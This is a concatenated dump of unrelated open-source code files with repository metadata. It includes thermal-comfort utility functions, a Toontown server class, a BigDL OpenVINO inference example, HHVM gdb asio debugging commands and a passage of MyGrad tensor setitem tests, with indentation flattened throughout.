# printer.print_field_int("set_state", m_set, $bits(m_set));
# printer.print_generic("value",
# `uvm_typename(m_value),
# 0,
# $sformatf("%0p", m_value));
#
# endfunction : do_print
#
#endclass // uvm_set_before_get_dap
uvm_object_utils(uvm_set_before_get_dap)
|
9820d214095e9d359699691b1f74a2f1e46b0d9d
|
a6f2d143f8301ef0cf2ab2524ed1a7d4115f6da6
|
/src/pythermalcomfort/utilities.py
|
d72af05bb2c3f857aa2f6be3714b6c143a52085f
|
[
"MIT"
] |
permissive
|
CenterForTheBuiltEnvironment/pythermalcomfort
|
4612fa9803613abd2101636c8e9bcf4b357ab254
|
8893b04aa06f84809f6f6d8324008cd1978cdd47
|
refs/heads/master
| 2023-09-01T02:24:57.594539
| 2023-07-05T01:39:43
| 2023-07-05T01:39:43
| 239,588,350
| 108
| 47
|
MIT
| 2023-09-14T00:04:01
| 2020-02-10T18:55:51
|
Python
|
UTF-8
|
Python
| false
| false
| 18,833
|
py
|
utilities.py
|
import numpy as np
import warnings
import math
import re
from pythermalcomfort.psychrometrics import p_sat, t_o
from pythermalcomfort.shared_functions import valid_range
warnings.simplefilter("always")
def transpose_sharp_altitude(sharp, altitude):
altitude_new = math.degrees(
math.asin(
math.sin(math.radians(abs(sharp - 90))) * math.cos(math.radians(altitude))
)
)
sharp = math.degrees(
math.atan(math.sin(math.radians(sharp)) * math.tan(math.radians(90 - altitude)))
)
sol_altitude = altitude_new
return round(sharp, 3), round(sol_altitude, 3)
def check_standard_compliance(standard, **kwargs):
params = dict()
params["standard"] = standard
for key, value in kwargs.items():
params[key] = value
if params["standard"] == "ankle_draft":
for key, value in params.items():
if key == "met" and value > 1.3:
warnings.warn(
"The ankle draft model is only valid for met <= 1.3",
UserWarning,
)
if key == "clo" and value > 0.7:
warnings.warn(
"The ankle draft model is only valid for clo <= 0.7",
UserWarning,
)
elif params["standard"] == "ashrae": # based on table 7.3.4 ashrae 55 2020
for key, value in params.items():
if key in ["tdb", "tr"]:
if key == "tdb":
parameter = "dry-bulb"
else:
parameter = "mean radiant"
if value > 40 or value < 10:
warnings.warn(
f"ASHRAE {parameter} temperature applicability limits between"
" 10 and 40 °C",
UserWarning,
)
if key in ["v", "vr"] and (value > 2 or value < 0):
warnings.warn(
"ASHRAE air speed applicability limits between 0 and 2 m/s",
UserWarning,
)
if key == "met" and (value > 4 or value < 1):
warnings.warn(
"ASHRAE met applicability limits between 1.0 and 4.0 met",
UserWarning,
)
if key == "clo" and (value > 1.5 or value < 0):
warnings.warn(
"ASHRAE clo applicability limits between 0.0 and 1.5 clo",
UserWarning,
)
if key == "v_limited" and value > 0.2:
raise ValueError(
"This equation is only applicable for air speed lower than 0.2 m/s"
)
elif params["standard"] == "iso": # based on ISO 7730:2005 page 3
for key, value in params.items():
if key == "tdb" and (value > 30 or value < 10):
warnings.warn(
"ISO air temperature applicability limits between 10 and 30 °C",
UserWarning,
)
if key == "tr" and (value > 40 or value < 10):
warnings.warn(
"ISO mean radiant temperature applicability limits between 10 and"
" 40 °C",
UserWarning,
)
if key in ["v", "vr"] and (value > 1 or value < 0):
warnings.warn(
"ISO air speed applicability limits between 0 and 1 m/s",
UserWarning,
)
if key == "met" and (value > 4 or value < 0.8):
warnings.warn(
"ISO met applicability limits between 0.8 and 4.0 met",
UserWarning,
)
if key == "clo" and (value > 2 or value < 0):
warnings.warn(
"ISO clo applicability limits between 0.0 and 2 clo",
UserWarning,
)
elif params["standard"] == "ISO7933": # based on ISO 7933:2004 Annex A
if params["tdb"] > 50 or params["tdb"] < 15:
warnings.warn(
"ISO 7933:2004 air temperature applicability limits between 15 and"
" 50 °C",
UserWarning,
)
p_a = p_sat(params["tdb"]) / 1000 * params["rh"] / 100
rh_max = 4.5 * 100 * 1000 / p_sat(params["tdb"])
if p_a > 4.5 or p_a < 0:
warnings.warn(
f"ISO 7933:2004 rh applicability limits between 0 and {rh_max} %",
UserWarning,
)
if params["tr"] - params["tdb"] > 60 or params["tr"] - params["tdb"] < 0:
warnings.warn(
"ISO 7933:2004 t_r - t_db applicability limits between 0 and 60 °C",
UserWarning,
)
if params["v"] > 3 or params["v"] < 0:
warnings.warn(
"ISO 7933:2004 air speed applicability limits between 0 and 3 m/s",
UserWarning,
)
if params["met"] > 450 or params["met"] < 100:
warnings.warn(
"ISO 7933:2004 met applicability limits between 100 and 450 met",
UserWarning,
)
if params["clo"] > 1 or params["clo"] < 0.1:
warnings.warn(
"ISO 7933:2004 clo applicability limits between 0.1 and 1 clo",
UserWarning,
)
def check_standard_compliance_array(standard, **kwargs):
default_kwargs = {"airspeed_control": True}
params = {**default_kwargs, **kwargs}
if standard == "ashrae": # based on table 7.3.4 ashrae 55 2020
tdb_valid = valid_range(params["tdb"], (10.0, 40.0))
tr_valid = valid_range(params["tr"], (10.0, 40.0))
v_valid = valid_range(params["v"], (0.0, 2.0))
if not params["airspeed_control"]:
v_valid = np.where(
(params["v"] > 0.8) & (params["clo"] < 0.7) & (params["met"] < 1.3),
np.nan,
v_valid,
)
to = t_o(params["tdb"], params["tr"], params["v"])
v_limit = 50.49 - 4.4047 * to + 0.096425 * to * to
v_valid = np.where(
(23 < to)
& (to < 25.5)
& (params["v"] > v_limit)
& (params["clo"] < 0.7)
& (params["met"] < 1.3),
np.nan,
v_valid,
)
v_valid = np.where(
(to <= 23)
& (params["v"] > 0.2)
& (params["clo"] < 0.7)
& (params["met"] < 1.3),
np.nan,
v_valid,
)
if "met" in params.keys():
met_valid = valid_range(params["met"], (1.0, 4.0))
clo_valid = valid_range(params["clo"], (0.0, 1.5))
return tdb_valid, tr_valid, v_valid, met_valid, clo_valid
else:
return tdb_valid, tr_valid, v_valid
if standard == "fan_heatwaves":
tdb_valid = valid_range(params["tdb"], (20.0, 50.0))
tr_valid = valid_range(params["tr"], (20.0, 50.0))
v_valid = valid_range(params["v"], (0.1, 4.5))
rh_valid = valid_range(params["rh"], (0, 100))
met_valid = valid_range(params["met"], (0.7, 2))
clo_valid = valid_range(params["clo"], (0.0, 1))
return tdb_valid, tr_valid, v_valid, rh_valid, met_valid, clo_valid
if standard == "iso": # based on ISO 7730:2005 page 3
tdb_valid = valid_range(params["tdb"], (10.0, 30.0))
tr_valid = valid_range(params["tr"], (10.0, 40.0))
v_valid = valid_range(params["v"], (0.0, 1.0))
met_valid = valid_range(params["met"], (0.8, 4.0))
clo_valid = valid_range(params["clo"], (0.0, 2))
return tdb_valid, tr_valid, v_valid, met_valid, clo_valid
def body_surface_area(weight, height, formula="dubois"):
"""Returns the body surface area in square meters.
Parameters
----------
weight : float
body weight, [kg]
height : float
height, [m]
formula : str, optional,
formula used to calculate the body surface area. default="dubois"
Choose a name from "dubois", "takahira", "fujimoto", or "kurazumi".
Returns
-------
body_surface_area : float
body surface area, [m2]
"""
if formula == "dubois":
return 0.202 * (weight**0.425) * (height**0.725)
elif formula == "takahira":
return 0.2042 * (weight**0.425) * (height**0.725)
elif formula == "fujimoto":
return 0.1882 * (weight**0.444) * (height**0.663)
elif formula == "kurazumi":
return 0.2440 * (weight**0.383) * (height**0.693)
else:
raise ValueError(
f"This {formula} to calculate the body_surface_area does not exists."
)
def f_svv(w, h, d):
"""Calculates the sky-vault view fraction.
Parameters
----------
w : float
width of the window, [m]
h : float
height of the window, [m]
d : float
distance between the occupant and the window, [m]
Returns
-------
f_svv : float
sky-vault view fraction ranges between 0 and 1
"""
return (
math.degrees(math.atan(h / (2 * d)))
* math.degrees(math.atan(w / (2 * d)))
/ 16200
)
def v_relative(v, met):
"""Estimates the relative air speed which combines the average air speed of
the space plus the relative air speed caused by the body movement. Vag is assumed to
be 0 for metabolic rates equal and lower than 1 met and otherwise equal to
Vag = 0.3 (M – 1) (m/s)
Parameters
----------
v : float or array-like
air speed measured by the sensor, [m/s]
met : float
metabolic rate, [met]
Returns
-------
vr : float or array-like
relative air speed, [m/s]
"""
return np.where(met > 1, np.around(v + 0.3 * (met - 1), 3), v)
def clo_dynamic(clo, met, standard="ASHRAE"):
"""Estimates the dynamic clothing insulation of a moving occupant. The activity as
well as the air speed modify the insulation characteristics of the clothing and the
adjacent air layer. Consequently, the ISO 7730 states that the clothing insulation
shall be corrected [2]_. The ASHRAE 55 Standard corrects for the effect
of the body movement for met equal or higher than 1.2 met using the equation
clo = Icl × (0.6 + 0.4/met)
Parameters
----------
clo : float or array-like
clothing insulation, [clo]
met : float or array-like
metabolic rate, [met]
standard: str (default="ASHRAE")
- If "ASHRAE", uses Equation provided in Section 5.2.2.2 of ASHRAE 55 2020
Returns
-------
clo : float or array-like
dynamic clothing insulation, [clo]
"""
standard = standard.lower()
if standard not in ["ashrae", "iso"]:
raise ValueError(
"only the ISO 7730 and ASHRAE 55 2020 models have been implemented"
)
if standard == "ashrae":
return np.where(met > 1.2, np.around(clo * (0.6 + 0.4 / met), 3), clo)
else:
return np.where(met > 1, np.around(clo * (0.6 + 0.4 / met), 3), clo)
def running_mean_outdoor_temperature(temp_array, alpha=0.8, units="SI"):
"""Estimates the running mean temperature also known as prevailing mean
outdoor temperature.
Parameters
----------
temp_array: list
array containing the mean daily temperature in descending order (i.e. from
newest/yesterday to oldest) :math:`[t_{day-1}, t_{day-2}, ... ,
t_{day-n}]`.
Where :math:`t_{day-1}` is yesterday's daily mean temperature. The EN
16798-1 2019 [3]_ states that n should be equal to 7
alpha : float
constant between 0 and 1. The EN 16798-1 2019 [3]_ recommends a value of 0.8,
while the ASHRAE 55 2020 recommends to choose values between 0.9 and 0.6,
corresponding to a slow- and fast- response running mean, respectively.
Adaptive comfort theory suggests that a slow-response running mean (alpha =
0.9) could be more appropriate for climates in which synoptic-scale (day-to-
day) temperature dynamics are relatively minor, such as the humid tropics.
units: str default="SI"
select the SI (International System of Units) or the IP (Imperial Units) system.
Returns
-------
t_rm : float
running mean outdoor temperature
"""
if units.lower() == "ip":
for ix, x in enumerate(temp_array):
temp_array[ix] = units_converter(tdb=temp_array[ix])[0]
coeff = [alpha**ix for ix, x in enumerate(temp_array)]
t_rm = sum([a * b for a, b in zip(coeff, temp_array)]) / sum(coeff)
if units.lower() == "ip":
t_rm = units_converter(tmp=t_rm, from_units="si")[0]
return round(t_rm, 1)
def units_converter(from_units="ip", **kwargs):
"""Converts IP values to SI units.
Parameters
----------
from_units: str
specify system to convert from
**kwargs : [t, v]
Returns
-------
converted values in SI units
"""
results = list()
if from_units == "ip":
for key, value in kwargs.items():
if "tmp" in key or key == "tr" or key == "tdb":
results.append((value - 32) * 5 / 9)
if key in ["v", "vr", "vel"]:
results.append(value / 3.281)
if key == "area":
results.append(value / 10.764)
if key == "pressure":
results.append(value * 101325)
elif from_units == "si":
for key, value in kwargs.items():
if "tmp" in key or key == "tr" or key == "tdb":
results.append((value * 9 / 5) + 32)
if key in ["v", "vr", "vel"]:
results.append(value * 3.281)
if key == "area":
results.append(value * 10.764)
if key == "pressure":
results.append(value / 101325)
return results
def mapping(value, map_dictionary, right=True):
"""Maps a temperature array to stress categories.
Parameters
----------
value : float, array-like
Temperature to map.
map_dictionary: dict
Dictionary used to map the values
right: bool, optional
Indicating whether the intervals include the right or the left bin edge.
Returns
-------
Stress category for each input temperature.
"""
bins = np.array(list(map_dictionary.keys()))
words = np.append(np.array(list(map_dictionary.values())), "unknown")
return words[np.digitize(value, bins, right=right)]
#: Met values of typical tasks.
met_typical_tasks = {
"Sleeping": 0.7,
"Reclining": 0.8,
"Seated, quiet": 1.0,
"Reading, seated": 1.0,
"Writing": 1.0,
"Typing": 1.1,
"Standing, relaxed": 1.2,
"Filing, seated": 1.2,
"Flying aircraft, routine": 1.2,
"Filing, standing": 1.4,
"Driving a car": 1.5,
"Walking about": 1.7,
"Cooking": 1.8,
"Table sawing": 1.8,
"Walking 2mph (3.2kmh)": 2.0,
"Lifting/packing": 2.1,
"Seated, heavy limb movement": 2.2,
"Light machine work": 2.2,
"Flying aircraft, combat": 2.4,
"Walking 3mph (4.8kmh)": 2.6,
"House cleaning": 2.7,
"Driving, heavy vehicle": 3.2,
"Dancing": 3.4,
"Calisthenics": 3.5,
"Walking 4mph (6.4kmh)": 3.8,
"Tennis": 3.8,
"Heavy machine work": 4.0,
"Handling 100lb (45 kg) bags": 4.0,
"Pick and shovel work": 4.4,
"Basketball": 6.3,
"Wrestling": 7.8,
}
#: Total clothing insulation of typical ensembles.
clo_typical_ensembles = {
"Walking shorts, short-sleeve shirt": 0.36,
"Typical summer indoor clothing": 0.5,
"Knee-length skirt, short-sleeve shirt, sandals, underwear": 0.54,
"Trousers, short-sleeve shirt, socks, shoes, underwear": 0.57,
"Trousers, long-sleeve shirt": 0.61,
"Knee-length skirt, long-sleeve shirt, full slip": 0.67,
"Sweat pants, long-sleeve sweatshirt": 0.74,
"Jacket, Trousers, long-sleeve shirt": 0.96,
"Typical winter indoor clothing": 1.0,
}
#: Clo values of individual clothing elements. To calculate the total clothing insulation you need to add these values together.
clo_individual_garments = {
"Metal chair": 0.00,
"Bra": 0.01,
"Wooden stool": 0.01,
"Ankle socks": 0.02,
"Shoes or sandals": 0.02,
"Slippers": 0.03,
"Panty hose": 0.02,
"Calf length socks": 0.03,
"Women's underwear": 0.03,
"Men's underwear": 0.04,
"Knee socks (thick)": 0.06,
"Short shorts": 0.06,
"Walking shorts": 0.08,
"T-shirt": 0.08,
"Standard office chair": 0.10,
"Executive chair": 0.15,
"Boots": 0.1,
"Sleeveless scoop-neck blouse": 0.12,
"Half slip": 0.14,
"Long underwear bottoms": 0.15,
"Full slip": 0.16,
"Short-sleeve knit shirt": 0.17,
"Sleeveless vest (thin)": 0.1,
"Sleeveless vest (thick)": 0.17,
"Sleeveless short gown (thin)": 0.18,
"Short-sleeve dress shirt": 0.19,
"Sleeveless long gown (thin)": 0.2,
"Long underwear top": 0.2,
"Thick skirt": 0.23,
"Long-sleeve dress shirt": 0.25,
"Long-sleeve flannel shirt": 0.34,
"Long-sleeve sweat shirt": 0.34,
"Short-sleeve hospital gown": 0.31,
"Short-sleeve short robe (thin)": 0.34,
"Short-sleeve pajamas": 0.42,
"Long-sleeve long gown": 0.46,
"Long-sleeve short wrap robe (thick)": 0.48,
"Long-sleeve pajamas (thick)": 0.57,
"Long-sleeve long wrap robe (thick)": 0.69,
"Thin trousers": 0.15,
"Thick trousers": 0.24,
"Sweatpants": 0.28,
"Overalls": 0.30,
"Coveralls": 0.49,
"Thin skirt": 0.14,
"Long-sleeve shirt dress (thin)": 0.33,
"Long-sleeve shirt dress (thick)": 0.47,
"Short-sleeve shirt dress": 0.29,
"Sleeveless, scoop-neck shirt (thin)": 0.23,
"Sleeveless, scoop-neck shirt (thick)": 0.27,
"Long sleeve shirt (thin)": 0.25,
"Long sleeve shirt (thick)": 0.36,
"Single-breasted coat (thin)": 0.36,
"Single-breasted coat (thick)": 0.44,
"Double-breasted coat (thin)": 0.42,
"Double-breasted coat (thick)": 0.48,
}
#: This dictionary contains the reflection coefficients, Fr, for different special materials
f_r_garments = {
"Cotton with aluminium paint": 0.42,
"Viscose with glossy aluminium foil": 0.19,
"Aramid (Kevlar) with glossy aluminium foil": 0.14,
"Wool with glossy aluminium foil": 0.12,
"Cotton with glossy aluminium foil": 0.04,
"Viscose vacuum metallized with aluminium": 0.06,
"Aramid vacuum metallized with aluminium": 0.04,
"Wool vacuum metallized with aluminium": 0.05,
"Cotton vacuum metallized with aluminium": 0.05,
"Glass fiber vacuum metallized with aluminium": 0.07,
}
|
aae6f836f4e57fcc4ffa604eff70afc99414fd36
|
da1721d2783ea4d67ff4e73cee6eee71292f2ef7
|
/toontown/coghq/CogSuitManagerAI.py
|
37ca35b58eed5d8e03ae814e51c10b2d98d6f3d1
|
[
"BSD-3-Clause"
] |
permissive
|
open-toontown/open-toontown
|
bbdeb1b7bf0fb2861eba2df5483738c0112090ca
|
464c2d45f60551c31397bd03561582804e760b4a
|
refs/heads/develop
| 2023-07-07T01:34:31.959657
| 2023-05-30T23:49:10
| 2023-05-30T23:49:10
| 219,221,570
| 143
| 104
|
BSD-3-Clause
| 2023-09-11T09:52:34
| 2019-11-02T22:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 708
|
py
|
CogSuitManagerAI.py
|
from otp.ai.AIBaseGlobal import *
from direct.directnotify import DirectNotifyGlobal
import random
from toontown.suit import SuitDNA
from . import CogDisguiseGlobals
class CogSuitManagerAI:
notify = DirectNotifyGlobal.directNotify.newCategory('CogSuitManagerAI')
def __init__(self, air):
self.air = air
def recoverPart(self, av, factoryType, suitTrack, zoneId, avList):
partsRecovered = [
0, 0, 0, 0]
part = av.giveGenericCogPart(factoryType, suitTrack)
if part:
partsRecovered[CogDisguiseGlobals.dept2deptIndex(suitTrack)] = part
self.air.questManager.toonRecoveredCogSuitPart(av, zoneId, avList)
return partsRecovered
|
ccc74d1f443f47c7f6325b76ce811786f347672c
|
f2034c76a11ce6296131d2bab89a5dae7d59edfe
|
/python/nano/tutorial/inference/openvino/openvino_inference_sync.py
|
24180c3f97ab776a2ae30ef5df7b7cbf75fdd38f
|
[
"Apache-2.0"
] |
permissive
|
intel-analytics/BigDL
|
e22cd917eecc7340bda3df4356acba0623a62ef6
|
4ffa012a426e0d16ed13b707b03d8787ddca6aa4
|
refs/heads/main
| 2023-08-22T06:31:37.923091
| 2023-08-22T02:58:42
| 2023-08-22T02:58:42
| 66,823,715
| 4,913
| 1,327
|
Apache-2.0
| 2023-09-14T10:41:50
| 2016-08-29T07:59:50
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,398
|
py
|
openvino_inference_sync.py
|
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Required Dependecies
# Install OpenVINO
# ```bash
# pip install openvino-dev
# ```
# Download model
# The following command is recommended to be executed in same directory as this script
# ```bash
# omz_downloader --name resnet18-xnor-binary-onnx-0001 -o ./model
# ```
import numpy as np
if __name__ == "__main__":
# use resnet18 model pretrained on ImageNet dataset for example
model_path = "model/intel/resnet18-xnor-binary-onnx-0001/FP16-INT1/resnet18-xnor-binary-onnx-0001.xml"
# prepare input data
x = np.random.randn(1,3,224,224)
# inference using Nano
from bigdl.nano.openvino import OpenVINOModel
ov_model = OpenVINOModel(model=model_path)
y_hat = ov_model(x)
predictions = y_hat.argmax(axis=1)
print(predictions)
|
7b1a2bccb7e723b10b595b3b6386c84b20a466c4
|
308f5596f1c7d382520cfce13ceaa5dff6f4f783
|
/hphp/tools/gdb/asio.py
|
aa1fab6ff030067d50cef8785431fcf3cc474b62
|
[
"PHP-3.01",
"Zend-2.0",
"MIT"
] |
permissive
|
facebook/hhvm
|
7e200a309a1cad5304621b0516f781c689d07a13
|
d8203129dc7e7bf8639a2b99db596baad3d56b46
|
refs/heads/master
| 2023-09-04T04:44:12.892628
| 2023-09-04T00:43:05
| 2023-09-04T00:43:05
| 455,600
| 10,335
| 2,326
|
NOASSERTION
| 2023-09-14T21:24:04
| 2010-01-02T01:17:06
|
C++
|
UTF-8
|
Python
| false
| false
| 10,864
|
py
|
asio.py
|
#!/usr/bin/env python3
"""
GDB commands for asio information and stacktraces.
"""
from compatibility import *
import gdb
from itertools import count
import re
from gdbutils import *
from lookup import lookup_func_from_fp
import frame
import idx
from sizeof import sizeof
#------------------------------------------------------------------------------
# WaitHandle wrapper class.
class WaitHandle:
"""Wrapper class for a HHVM::c_Awaitable*."""
##
# gdb.Value delegation.
#
def __init__(self, wh):
if not isinstance(wh, gdb.Value):
raise TypeError('bad call to WaitHandle()')
if (
not str(deref(wh).type).endswith('WaitHandle')
and not str(deref(wh).type).endswith('Awaitable')
):
raise TypeError('non-WaitHandle[*] value passed to WaitHandle()')
self.wh = wh
wh_name = 'HPHP::c_' + self.kind_str() + 'WaitHandle'
self.wh = self.wh.cast(T(wh_name).pointer())
def __getitem__(self, idx):
return self.wh[idx]
def get(self):
return self.wh
##
# c_Awaitable* methods.
#
def kind(self):
kind_ty = T('HPHP::c_Awaitable::Kind')
return (self.wh['m_kind_state'] >> 4).cast(kind_ty)
def kind_str(self):
return str(self.kind())[len('HPHP::c_Awaitable::Kind::'):]
def state(self):
return (self.wh['m_kind_state'] & 0xf).cast(T('uint8_t'))
def state_str(self):
kind = self.kind_str()
state = self.state()
res = 'INVALID'
# Each WaitHandle has its own states...
if state == 0:
res = 'SUCCEEDED'
elif state == 1:
res = 'FAILED'
elif state == 2:
if kind == 'Sleep' or kind == 'ExternalThreadEvent':
res = 'WAITING'
elif kind == 'Reschedule':
res = 'SCHEDULED'
else:
res = 'BLOCKED'
elif state == 3 and kind == 'Resumable':
res = 'SCHEDULED'
elif state == 4 and kind == 'Resumable':
res = 'RUNNING'
return res
def finished(self):
return self.state() <= K('HPHP::c_Awaitable::STATE_FAILED')
def resumable(self):
resumable_ty = T('HPHP::Resumable')
if deref(self.wh).type == T('HPHP::c_AsyncFunctionWaitHandle'):
p = self.wh.cast(T('char').pointer()) - resumable_ty.sizeof
return p.cast(resumable_ty.pointer())
if deref(self.wh).type == T('HPHP::c_AsyncGeneratorWaitHandle'):
gen = self.wh['m_generator']
native_data_ty = T('HPHP::AsyncGenerator')
p = gen.cast(T('char').pointer()) - native_data_ty.sizeof
return p.cast(resumable_ty.pointer())
return None
def func(self):
resumable = self.resumable()
if resumable is None:
return None
return lookup_func_from_fp(resumable['m_actRec'])
##
# Parent chain.
#
def parent(self):
"""Same as wh->getParentChain().firstInContext(wh->getContextIdx())."""
ctx_idx = self.wh['m_contextIdx']
blockable = self.wh['m_parentChain']['m_lastParent']
result = None
while blockable != nullptr():
wh = WaitHandle.from_blockable(blockable)
if (
wh is not None
and not wh.finished()
and wh['m_contextIdx'] == ctx_idx
):
result = wh
ty = T('HPHP::AsioBlockable').pointer()
blockable = (blockable['m_bits'] & ~0x7).cast(ty)
return result
def chain(self):
"""Generate a WaitHandle's parent chain."""
wh = self
while wh is not None:
yield wh
wh = wh.parent()
##
# Static constructors.
#
@staticmethod
def from_blockable(blockable):
"""Get the containing WaitHandle of an AsioBlockable*."""
bits = blockable['m_bits']
kind_str = 'HPHP::AsioBlockable::Kind'
# The remaining bits point to the next blockable in the chain.
kind = (bits & 0x7).cast(T(kind_str))
m = re.match(kind_str + r'::(\w+)WaitHandle\w*', str(kind))
if m is None:
return None
wh_name = m.group(1)
if wh_name == 'AsyncFunction':
offset = 48
elif wh_name == 'AsyncGenerator':
offset = 56
elif wh_name == 'AwaitAll':
offset = 48
elif wh_name == 'Condition':
offset = 48
else:
return None
wh_ptype = T('HPHP::c_' + wh_name + 'WaitHandle').pointer()
wh = (blockable.cast(T('char').pointer()) - offset).cast(wh_ptype)
try:
if blockable != wh['m_blockable'].address:
return None
except:
if blockable != wh['m_children'][0]['m_blockable'].address:
return None
return WaitHandle(wh)
def to_string(self):
str = '%s @ %s' % (deref(self.wh).type, self.wh)
func = self.func()
if func is not None:
str = str + (' (%s)' % (nameof(func)))
return str
#------------------------------------------------------------------------------
# Other ASIO helpers.
def asio_context(ctx_idx=None):
"""Get the AsioContext in the current thread by index."""
contexts = TL('HPHP::AsioSession::s_current')['m_p']['m_contexts']
top_idx = sizeof(contexts)
if ctx_idx is None:
ctx_idx = top_idx
if ctx_idx > top_idx:
return None
# AsioContexts are numbered from 1.
return idx.vector_at(contexts, ctx_idx - 1)
#------------------------------------------------------------------------------
# ASIO stacktraces.
def asio_stacktrace(wh, limit=None):
"""Produce a list of async frames by following a WaitHandle's parent chain.
The stacktrace ends at the WaitHandle::join().
The whole chain is walked even if `limit' is provided---the return
stacktrace will have `limit' or fewer entries if there were `limit' or
fewer frames, and `limit' + 1 frames otherwise, where the last frame is the
WaitHandle::join().
"""
stacktrace = []
count = 0
for wh in WaitHandle(wh).chain():
resumable = wh.resumable()
if resumable is None:
continue
if limit is None or count < limit:
stacktrace.append(frame.create_resumable(count, resumable))
count += 1
# FIXME: requires RDS lookup
#ar = asio_context(wh['m_contextIdx'])['m_savedFP']
ar = nullptr()
if ar != nullptr():
stacktrace.append(frame.create_php(idx=count, ar=ar))
return stacktrace
class AsyncStkCommand(gdb.Command):
"""Dump the async function stacktrace for a given WaitHandle.
The format used is the same as that used by `walkstk'.
"""
def __init__(self):
super(AsyncStkCommand, self).__init__('asyncstk', gdb.COMMAND_STACK)
@errorwrap
def invoke(self, args, from_tty):
try:
wh = gdb.parse_and_eval(args)
except gdb.error:
print('Usage: asyncstk wait-handle')
return
try:
stacktrace = asio_stacktrace(wh)
except TypeError:
print('asyncstk: Argument must be a WaitHandle object or pointer.')
return
for s in frame.stringify_stacktrace(stacktrace):
print(s)
AsyncStkCommand()
#------------------------------------------------------------------------------
# `info asio' command.
class InfoAsioCommand(gdb.Command):
"""Metadata about the currently in-scope AsioContext"""
def __init__(self):
super(InfoAsioCommand, self).__init__('info asio', gdb.COMMAND_STATUS)
@errorwrap
def invoke(self, args, from_tty):
asio_session = TL('HPHP::AsioSession::s_current')['m_p']
contexts = asio_session['m_contexts']
num_contexts = sizeof(contexts)
if num_contexts == 0:
print('Not currently in the scope of an AsioContext')
return
asio_ctx = asio_context()
# Count the number of contexts, and print the topmost.
print('\n%d stacked AsioContext%s (current: (%s) %s)' % (
int(num_contexts),
plural_suffix(num_contexts),
str(asio_ctx.type),
str(asio_ctx)))
# Get the current vmfp().
header_ptype = T('HPHP::rds::Header').pointer()
vmfp = TL('HPHP::rds::tl_base').cast(header_ptype)['vmRegs']['fp'] # gdb.Value[HPHP::ActRec]
wh_ptype = T('HPHP::c_WaitableWaitHandle').pointer()
# Find the most recent join().
for _i, fp in izip(count(), frame.gen_php(vmfp)):
if nameof(lookup_func_from_fp(fp)) == r'HH\WaitHandle::join':
break
if nameof(lookup_func_from_fp(fp)) != r'HH\WaitHandle::join':
print("...but couldn't find join(). Something is wrong.\n")
return
wh = fp['m_this'].cast(wh_ptype)
print('\nCurrently %s WaitHandle: (%s) %s [state: %s]' % (
'joining' if i == 0 else 'executing',
str(wh.type),
str(wh),
WaitHandle(wh).state_str()))
# Dump the async stacktrace.
for s in frame.stringify_stacktrace(asio_stacktrace(wh)):
print(' %s' % s)
# Count the number of queued runnables.
queue_size = sizeof(asio_ctx['m_runnableQueue'])
print('%d other resumable%s queued' % (
int(queue_size),
plural_suffix(queue_size)))
sleeps = asio_ctx['m_sleepEvents']
externals = asio_ctx['m_externalThreadEvents']
num_sleeps = sizeof(sleeps)
num_externals = sizeof(externals)
# Count sleep and external thread events.
print('')
print('%d pending sleep event%s' % (
int(num_sleeps), plural_suffix(num_sleeps)))
print('%d pending external thread event%s' % (
int(num_externals), plural_suffix(num_externals)))
# Dump sleep and external thread event stacktraces.
for vec in [sleeps, externals]:
for i in xrange(int(sizeof(vec))):
wh = idx.vector_at(vec, i)
stacktrace = frame.stringify_stacktrace(asio_stacktrace(wh, 3))
print('\n(%s) %s [state: %s]' % (
str(wh.type), str(wh), WaitHandle(wh).state_str()))
if len(stacktrace) == 4:
for s in stacktrace[0:-1]:
print(' %s' % s)
print(' ...')
print(' %s' % stacktrace[-1])
else:
for s in stacktrace:
print(' %s' % s)
print('')
InfoAsioCommand()
|
5b32de04e8a62419416c294cac0e1787d22917cb
|
ca98f0332b773f9b1982118daf94ba75ffeaa90d
|
/tests/tensor_ops/test_setitem.py
|
8cb2ffa666032b402fa9605ad67d9ce3a129c236
|
[
"MIT"
] |
permissive
|
rsokl/MyGrad
|
f5b745b26a01ddda4ff6ce279746c47cb2f021cf
|
133072b526966e235d70bbfcf9eb86d43d0fcfa1
|
refs/heads/master
| 2023-07-09T01:20:42.314017
| 2023-07-03T19:13:30
| 2023-07-03T19:13:30
| 97,431,804
| 186
| 28
|
MIT
| 2023-07-03T19:13:32
| 2017-07-17T03:31:24
|
Python
|
UTF-8
|
Python
| false
| false
| 13,631
|
py
|
test_setitem.py
|
from typing import Callable
import hypothesis.extra.numpy as hnp
import hypothesis.strategies as st
import numpy as np
import pytest
from hypothesis import assume, given, note, settings
from numpy.testing import assert_allclose, assert_array_equal
import mygrad as mg
from mygrad._tensor_core_ops.indexing import (
_arr,
_is_bool_array_index,
_is_int_array_index,
)
from mygrad.tensor_base import Tensor
from ..custom_strategies import (
adv_integer_index,
arbitrary_indices,
basic_indices,
broadcastable_shapes,
tensors,
)
from ..utils.numerical_gradient import numerical_gradient_full
# test utilties used by setitem
def test_arr_util():
assert_array_equal(_arr(2, 2), np.arange(4).reshape(2, 2))
assert_array_equal(_arr(4, 3), np.arange(12).reshape(4, 3))
@given(tensors(elements=st.floats(-10, 10)))
def test_setitem_mutates_input(x: Tensor):
assume(x.size)
data_copy = np.array(x, copy=True)
data_view = np.asarray(x)
with mg.no_autodiff:
x[...] = 1 + x
assert np.all(x == data_view)
assert np.all(data_copy != data_view)
@pytest.mark.parametrize(
("arr", "truth"),
[
((0, 0), False),
((np.array([True]),), False),
((np.array([True]), [1]), True),
((np.array([True]), [1]), True),
((np.array([1]), [1]), True),
((np.array([True]), 1), False),
((np.array([True]), slice(None)), False),
],
)
def test_int_array_test(arr, truth):
assert _is_int_array_index(arr) is truth
@pytest.mark.parametrize(
("arr", "truth"),
[
((0, 0), False),
((np.array([True]),), True),
((np.array([True]), np.array([False])), False),
((np.array([1]), [1]), False),
((np.array([True]), 1), False),
((np.array([True]), slice(None)), False),
],
)
def test_bool_array_test(arr, truth):
assert _is_bool_array_index(arr) is truth
def setitem(x, y, index):
x_copy = np.copy(x)
x_copy[index] = y
return x_copy
class set_item_test_factory:
